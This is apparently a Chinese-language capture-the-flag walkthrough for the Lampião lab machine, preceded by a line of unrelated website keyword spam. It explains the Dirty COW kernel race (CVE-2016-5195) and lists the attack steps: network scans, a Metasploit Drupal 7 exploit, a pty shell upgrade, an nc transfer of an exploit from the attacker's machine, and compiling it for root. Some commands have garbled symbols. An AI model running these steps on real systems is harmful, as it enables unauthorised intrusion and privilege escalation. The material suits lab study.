电子商务网站建设题6,wordpress怎么中文字体,wordpress获取主页路径,一个网站的开发周期文章目录 漏洞介绍简介原因类型版本危害 信息收集主机扫描端口扫描 漏洞探测漏洞利用权限提升nc文件传输编译 参考 靶机地址#xff1a;lampiao 下载地址#xff1a;Lampio: 1 漏洞介绍
简介
脏牛#xff08;Dirty Cow#xff09;是Linux内核的一个提权漏洞#xff0c;… 文章目录 漏洞介绍简介原因类型版本危害 信息收集主机扫描端口扫描 漏洞探测漏洞利用权限提升nc文件传输编译 参考 靶机地址lampiao 下载地址Lampião: 1 漏洞介绍
简介
脏牛Dirty Cow是Linux内核的一个提权漏洞之所以叫Dirty CowLinux内核的内存子系统在处理写时拷贝Copy-on-Write)时存在条件竞争漏洞导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限有可能进一步导致提权漏洞。竞争条件指的是任务执行顺序异常可导致应用崩溃或令攻击者有机可乘进一步执行其他代码。利用这一漏洞攻击者可在其目标系统提升权限甚至可能获得root权限。脏牛的CVE编号是CVE-2016-5195。
原因
很多情况下我们希望能够并行地去处理多个相同的进程比如我们需要去并行计算一些东西所以内核中就存在复制进程的操作而fork()函数就是用来复制进程的函数它可以拷贝当前进程的内存空间创建一个新的内存空间这样我们就拥有了两个完全一样的进程空间。但是这个复制过程是很耗费空间和时间的因为每个子进程都有和父进程一样大的物理空间但是这些进程可能并不会执行写的操作也就是不会对原始的文件进行更改那这种浪费就是没有必要的所以我们采取了COWCopy On Write技术进行优化。
COWCopy On Write技术是一种内存管理技术它在进程复制时不会立即为进程分配物理内存而是为进程建立虚拟的内存空间将虚拟空间指向物理空间便于读取文件只有当需要执行文件写操作的时候才会复制一份物理内存空间分配给它然后进程在这个复制完的物理内存空间中进行修改而不会影响其他进程。换句话说在COW机制中当多个进程共享一个只读文件的时候内核会把该文件的内存映射到这些进程的虚拟地址空间中这些进程都可以读取该文件的内容当有进程要修改文件时就会把这个原始文件的状态改成可写状态然后内核会将该原始文件复制一份原始文件再改回只读状态然后进程就修改这份副本而原始文件仍然可以被其它进程共享这就是Copy-on-Write的核心思想。
原始只读文件——修改为可写状态——复制原始只读文件——原始状态改回可读。
但是在这个过程中存在竞态条件。假如现在多个进程同时共享一个只读文件那么内核可能会把这个文件复制多次使得每个进程可以修改但是在内核将原始只读文件的访问状态从可写改回只读之前多个进程都可以访问和修改原始文件导致了竞态条件的产生如果有恶意进程在这段时间进行了修改那么修改的就是原始文件从而产生了漏洞。
该漏洞利用了Copy-on-Write机制中的竞态条件攻击者可以利用这个竞态条件来获取对一个本来只读的文件的写权限从而提升为本地管理员权限。
类型
内核竞态条件漏洞
版本
Linux kernel2.6.22的所有Linux系统即从2007年发布的2.6.22开始到2016年10月18日为止这中间发行的所有Linux系统都受影响
危害
本地提权 信息收集
主机扫描 sudo arp-scan -l 端口扫描
sudo nmap --min-rate 10000 -p- 192.168.8.29详情扫描
sudo nmap -sT -sC -sV -O -p 22,80,1898 192.168.8.29可以看到1889端口使用的是Drupal7的CMS
漏洞探测
访问80 访问1898 通过指纹识别插件也可以看到是Drupal 7 漏洞利用
使用msf
search drupal 7use 1
show options显示该模块的可用选项发现我们需要指定主机和端口
set rhosts 192.168.8.29
set rport 1898
run查看一下当前的用户发现不是root用户证明需要进行本地提权我们将放在攻击机上的漏洞探针脚本上传到靶机
getuid可以使用uname -a找到相应的版本并查看是否可以有相关漏洞可以利用
也可以使用相关探针进行探测这里使用linux-exploit-suggester.sh
git clone https://github.com/mzet-/linux-exploit-suggester上传漏洞探测脚本
upload /home/kali/tools/linux-exploit-suggester/linux-exploit-suggester.sh /tmp/demo.sh文件上传成功后使用shell命令执行提升权限执行探测脚本
shell
python -c import pty;pty.spawn(/bin/bash)
chmod x demo.sh
./demo.sh执行成功后探测出了相应的信息及漏洞我们就发现有一个漏洞就是脏牛漏洞CVE-2016-5195 权限提升
EXP地址https://github.com/gbonacini/CVE-2016-5195 nc文件传输
使用nc进行文件传输
靶机上进行监听
nc -l 5064 dcow.cppkali攻击机
nc 192.168.8.29 5064 dcow.cpp编译
靶机上进行编译生成一个可执行文件dcow
g -Wall -pedantic -o2 -stdc11 -pthread -o dcow dcow.cpp -lutil或者直接输入 make 进行编译成可执行文件提权 参考
https://dirtycow.ninja/https://www.anquanke.com/post/id/84851